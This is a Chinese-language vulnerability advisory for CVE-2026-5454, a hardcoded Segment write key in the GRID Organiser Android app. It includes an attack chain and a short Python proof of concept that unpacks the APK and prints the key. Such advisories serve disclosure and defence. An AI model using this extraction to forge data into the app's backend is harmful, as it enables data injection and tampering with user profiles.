CVE-2026-5454 CVSS 3.3 低危

CVE-2026-5454 GRID Organiser硬编码密钥漏洞

披露日期: 2026-04-03

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5454

漏洞类型

硬编码密钥

CVSS评分

3.3 低危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

GRID Organiser App

漏洞概述

GRID Organiser App（Android平台）在1.0.5及之前的版本中存在安全漏洞。该漏洞源于组件co.gridapp.organiser的res/raw/app.json文件中使用了硬编码的加密密钥。攻击者通过本地访问并操纵SegmentWriteKey参数可利用此漏洞。尽管需要本地访问和低权限，且利用代码已公开，但主要风险在于数据隐私泄露。

技术细节

该漏洞是典型的硬编码密钥问题。位于Android应用包内的res/raw/app.json文件明文存储了名为SegmentWriteKey的敏感参数。应用在运行时直接读取该文件中的值进行身份验证或数据传输。攻击者只需在本地设备上安装应用，或获取APK文件并解包，即可轻易读取该JSON文件并提取密钥。一旦获取该密钥，攻击者可利用其向Segment等服务发送伪造数据，导致数据注入和用户资料被篡改。虽然攻击向量为本地且需低权限，但此类配置错误严重违反了移动应用安全开发规范。

攻击链分析

STEP 1

获取本地访问

攻击者获得对Android设备的物理访问权限或低权限账户访问权限。

STEP 2

提取应用包

攻击者从设备中提取GRID Organiser App的APK安装包文件。

STEP 3

解包定位文件

使用解压工具打开APK，定位到res/raw/app.json文件。

STEP 4

读取硬编码密钥

攻击者读取app.json内容，提取SegmentWriteKey参数的值。

STEP 5

利用密钥

利用提取的密钥向Segment等后端服务发送伪造请求，进行数据注入或用户资料篡改。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-5454
# This script demonstrates extracting the hardcoded key from the APK.

import zipfile
import json
import sys

def check_apk_vulnerability(apk_path):
    try:
        with zipfile.ZipFile(apk_path, 'r') as z:
            # Target file containing the hardcoded key
            target_file = 'res/raw/app.json'
            
            if target_file in z.namelist():
                print(f"[+] Found {target_file}")
                data = z.read(target_file)
                json_content = json.loads(data)
                
                # Check for the specific vulnerable argument
                if 'SegmentWriteKey' in json_content:
                    print(f"[!] Vulnerability Confirmed: Hardcoded SegmentWriteKey found.")
                    print(f"    Key Value: {json_content['SegmentWriteKey']}")
                else:
                    print("[-] SegmentWriteKey not found in the JSON file.")
            else:
                print(f"[-] Target file {target_file} not found in APK.")
                
    except Exception as e:
        print(f"[!] Error during analysis: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python poc.py <path_to_grid_organiser.apk>")
    else:
        check_apk_vulnerability(sys.argv[1])

影响范围

GRID Organiser App <= 1.0.5

防御指南

临时缓解措施

建议开发者立即发布更新，移除app.json中的硬编码密钥，改用服务端代理或动态获取密钥的方式。用户在等待补丁期间应限制应用的网络权限或谨慎使用。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表